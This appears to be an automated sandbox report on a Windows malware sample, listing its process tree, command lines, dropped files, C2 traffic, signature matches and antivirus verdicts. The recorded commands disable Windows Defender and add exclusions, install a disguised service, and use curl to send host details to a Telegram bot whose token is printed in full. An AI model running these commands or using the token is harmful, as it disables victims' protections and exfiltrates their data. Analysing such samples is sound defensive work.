Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Aug. 5, 2024, 10:35 a.m. | Aug. 5, 2024, 10:46 a.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2060 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\
2232 -
1.exe "C:\programdata\1.exe" /D
2376 -
-
-
chcp.com chcp 65001
2600 -
powershell.exe powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
2672 -
tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
2768 -
find.exe find /I /N "Superfetch.exe"
2804 -
takeown.exe takeown /f c:\windows\tasks
2952 -
timeout.exe TIMEOUT /T 3 /NOBREAK
2996 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
2236 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
2436 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
2512 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
2484 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)"
2620 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)"
2696 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
2720 -
timeout.exe TIMEOUT /T 3 /NOBREAK
2828 -
-
-
timeout.exe TIMEOUT /T 1 /NOBREAK
2280 -
Wmiic.exe "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
2900 -
timeout.exe TIMEOUT /T 1 /NOBREAK
2764 -
Wmiic.exe "C:\windows\tasks\wmiic" start WMService
2852 -
timeout.exe TIMEOUT /T 2 /NOBREAK
2340 -
-
net1.exe C:\Windows\system32\net1 start WMService
2568
-
-
-
-
-
WMIC.exe WMIC CPU Get Name /Value
2532 -
findstr.exe FindStr .
2616
-
-
cmd.exe C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
2740 -
tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
2784 -
find.exe find /I /N "Superfetch.exe"
1676 -
curl.exe c:\programdata\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="TEST22-PCCORE2Intel(R) Core(TM) i5-8400 CPU @ 2.80GHzIntel(R) Core(TM) i5-8400 CPU @ 2.80GHzSERVICE WMService NOT RUN" "https://api.telegram.org/bot"5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM"/sendMessage"
2104
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
api.telegram.org | 149.154.167.220 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.3 192.168.56.103:49216 149.154.167.220:443 |
None | None | None |
pdb_path | D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb |
section | .gfids |
resource name | PNG |
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://185.213.208.196:8080/client/setClientConfig?clientId=test22-PC | ||||||
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://185.213.208.196:8080/client/setClientStatus?clientId=test22-PC |
request | POST http://185.213.208.196:8080/client/setClientConfig?clientId=test22-PC |
request | POST http://185.213.208.196:8080/client/setClientStatus?clientId=test22-PC |
request | POST http://185.213.208.196:8080/client/setClientConfig?clientId=test22-PC |
request | POST http://185.213.208.196:8080/client/setClientStatus?clientId=test22-PC |
file | C:\ProgramData\migrate.exe |
file | C:\Windows\Tasks\run.bat |
file | C:\Windows\Tasks\MSTask.exe |
file | C:\Windows\Tasks\IntelConfigService.exe |
file | C:\ProgramData\curl.exe |
file | C:\ProgramData\1.exe |
file | C:\Windows\Tasks\Wrap.exe |
file | C:\ProgramData\st.bat |
file | C:\Windows\Tasks\Superfetch.exe |
file | C:\Windows\Tasks\ApplicationsFrameHost.exe |
file | C:\ProgramData\ru.bat |
file | C:\Windows\Tasks\Wmiic.exe |
file | C:\ProgramData\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "=" |
cmdline | powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\ |
cmdline | C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr . |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\ |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true |
cmdline | powershell Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\ |
cmdline | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
cmdline | WMIC CPU Get Name /Value |
cmdline | WMIC /Node:localhost Path Win32_VideoController Get Name /Value |
cmdline | C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat" |
file | C:\Windows\Tasks\Wmiic.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SUPERFETCH.EXE' |
wmi | SELECT Name FROM Win32_VideoController |
wmi | SELECT Name FROM WIN32_PROCESSOR |
section | {u'size_of_data': u'0x0000e200', u'virtual_address': u'0x00062000', u'entropy': 6.803785215984442, u'name': u'.rsrc', u'virtual_size': u'0x0000e020'} | entropy | 6.80378521598 | description | A section with a high entropy has been found |
process | 1.exe |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
cmdline | tasklist /FI "IMAGENAME eq Superfetch.exe" |
cmdline | chcp 65001 |
cmdline | C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "=" |
cmdline | net start WMService |
cmdline | C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr . |
cmdline | WMIC CPU Get Name /Value |
cmdline | WMIC /Node:localhost Path Win32_VideoController Get Name /Value |
wmi | SELECT Name FROM WIN32_PROCESSOR |
host | 185.213.208.196 |
service_name | WMService | service_path | C:\Windows\Tasks\Wmiic.exe | ||||||
file | C:\Windows\Tasks\run.bat | ||||||||
file | C:\Windows\Tasks\WinRing0x64.sys | ||||||||
file | C:\Windows\Tasks\MSTask.exe | ||||||||
file | C:\Windows\Tasks\config.json | ||||||||
file | C:\Windows\Tasks\IntelConfigService.exe | ||||||||
file | C:\Windows\Tasks\Wrap.exe | ||||||||
file | C:\Windows\Tasks\Superfetch.exe | ||||||||
file | C:\Windows\Tasks\ApplicationsFrameHost.exe | ||||||||
file | C:\Windows\Tasks\Wmiic.exe |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)" |
service | WinDefend (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start) |
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware | ||||||
description | attempts to disable windows defender | registry | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start |
Bkav | W32.AIDetectMalware |
Lionic | Trojan.Win32.DefenderControl.a!c |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 100) |
CAT-QuickHeal | Trojan.Multi |
Skyhigh | BehavesLike.Win32.Generic.tc |
ALYac | Trojan.GenericKD.65288535 |
Cylance | Unsafe |
VIPRE | Trojan.Uztuby.36 |
Sangfor | Hacktool.Win32.Defendercontrol.V8yj |
K7AntiVirus | Riskware ( 0040eff71 ) |
BitDefender | Trojan.Uztuby.36 |
K7GW | Riskware ( 0040eff71 ) |
Cybereason | malicious.2e2853 |
Arcabit | Trojan.Uztuby.36 [many] |
Symantec | Trojan.Gen.MBT |
ESET-NOD32 | multiple detections |
McAfee | Artemis!53540062E285 |
Avast | Win32:Malware-gen |
ClamAV | Win.Trojan.DarkKomet-10027799-0 |
Kaspersky | HEUR:Trojan-Downloader.BAT.Agent.gen |
Alibaba | TrojanDownloader:Win32/DefenderDisabler.a8c972c6 |
MicroWorld-eScan | Trojan.Uztuby.36 |
Rising | HackTool.Defendercontrol!8.11556 (CLOUD) |
Emsisoft | Trojan.Uztuby.36 (B) |
DrWeb | Trojan.MulDrop20.62369 |
TrendMicro | HackTool.Win32.DefenderControl.AA |
McAfeeD | ti!6A1C8FE3F496 |
FireEye | Generic.mg.53540062e2853766 |
Sophos | Mal/Generic-S |
Ikarus | Trojan.Rasftuby |
Antiy-AVL | HackTool/Win32.DefenderControl |
Kingsoft | Win32.Troj.Unknown.a |
Gridinsoft | Trojan.Win32.Downloader.mz!s5 |
Xcitium | ApplicUnwnt@#1y78js06n91ja |
Microsoft | HackTool:Win32/Defendercontrol.A |
ZoneAlarm | HEUR:Trojan-Downloader.BAT.Agent.gen |
GData | Trojan.Uztuby.36 |
Varist | W32/DefControl.PCBH-4448 |
DeepInstinct | MALICIOUS |
VBA32 | Trojan.Zpevdo |
Malwarebytes | Generic.Malware.AI.DDS |
Panda | Trj/CI.A |
TrendMicro-HouseCall | HackTool.Win32.DefenderControl.AA |
Tencent | Bat.Trojan-Downloader.Agent.Bkjl |
Yandex | Trojan.Igent.bUUdXO.40 |
MAX | malware (ai score=80) |
MaxSecure | Trojan.Malware.121218.susgen |
Fortinet | Riskware/DefenderControl |
AVG | Win32:Malware-gen |